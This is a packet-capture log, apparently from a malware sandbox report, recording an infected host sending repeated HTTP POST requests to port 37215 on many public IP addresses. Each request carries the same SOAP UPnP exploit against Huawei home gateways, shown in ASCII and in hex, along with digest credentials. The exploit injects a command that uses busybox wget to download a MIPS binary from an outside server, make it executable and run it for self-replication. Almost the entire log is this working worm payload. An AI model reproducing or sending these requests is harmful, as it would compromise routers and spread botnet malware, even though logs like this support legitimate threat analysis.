                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1780192.168.2.2347764157.86.112.21737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543370008 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1781192.168.2.2339168197.252.123.9937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543452024 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1782192.168.2.2354694179.144.170.6737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543458939 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1783192.168.2.2334416197.131.118.19037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543468952 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1784192.168.2.2356000156.168.189.2437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543472052 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1785192.168.2.2339494157.176.79.637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543487072 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1786192.168.2.2350356197.27.115.4937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543497086 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1787192.168.2.2335536157.97.7.23637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543497086 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1788192.168.2.235278841.133.147.7037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543519974 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1789192.168.2.235358613.179.158.7537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543520927 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1790192.168.2.2346280197.251.48.23937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543535948 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
